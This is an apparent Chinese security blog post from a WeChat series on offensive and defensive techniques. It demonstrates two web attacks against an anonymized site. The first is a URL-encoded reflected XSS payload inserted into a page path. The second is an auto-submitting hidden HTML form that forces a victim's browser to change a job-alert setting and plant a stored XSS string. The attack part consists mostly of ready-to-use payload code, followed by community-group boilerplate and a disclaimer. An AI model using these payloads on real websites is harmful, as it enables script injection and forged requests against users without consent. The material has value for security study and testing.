1
假设有如下网址:
https://xxx.xxx.xxx/FAQ/Aaabbbbbb-Question-FAQ200086-E1651.htm?countryRedirect=true将如下payload插入到Aaabbbbbb之间
%22%3e%3cimg%20onerro%3d%3e%3cimg%20src%3dx%20onerror%3dalert%601%60%3e
最终访问
https://xxx.xxx.xxx/FAQ/Aaa%22%3e%3cimg%20onerro%3d%3e%3cimg%20src%3dx%20onerror%3dalert%601%60%3ebbbbbb-Question-FAQ200086-E1651.htm?countryRedirect=true
将有可能造成反射型XSS
2
上传一个视频秀,在payload处添加有效载荷,当用户打开恶意页面加载有效载荷时,触发弹窗。
<body><form id="xss" action="https://xxx.xxx.xxx/profile/editJobAlert.htm" method="post"><input type="hidden" name="setupJobAlertEmail" value="false"><br><input type="hidden" name="userValidationKey" value=""><br><input type="hidden" name="key" value=""><br><input type="hidden" name="jobAlertId" value="[the id of the jobalert]"><br><input type="hidden" name="JAK" value=""><br><input type="hidden" name="reactivation" value="false"><br><input type="hidden" name="linkOrigin" value=""><br><input type="hidden" name="keywords" value="[the name]"><br><input type="hidden" name="rawLocationName" value="Cairo"><br><input type="hidden" name="locationType" value="C"><br><input type="hidden" id="payload" name="locationId" value=""><br><input type="hidden" name="emailFrequency" value="WEEKLY"><br><input type="hidden" value="send"></form></body><script type="text/javascript">var x = "1234567'><marquee onstart="[domain].find(confirm)">";document.getElementById("payload").value = x;document.getElementById("xss").submit();</script>
星光不问赶路人,岁月不负有心人!
加油,网安人!
“攻防技术交流”这一个系列的文章
主要记录日常实战与学习交流的
攻防思路与心得体会
如果你有新奇的攻防idea
非常欢迎与小伙伴们一起分享交流
VX群暗号:
后台回复“ 技术交流 ”获取
入群须知:
纯技术交流群禁止灌水
长期潜水不分享交流的会进行清理
希望大家予以理解
本文始发于微信公众号(西子实验室):安全娱乐圈之攻防技术交流系列文章 第5弹
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论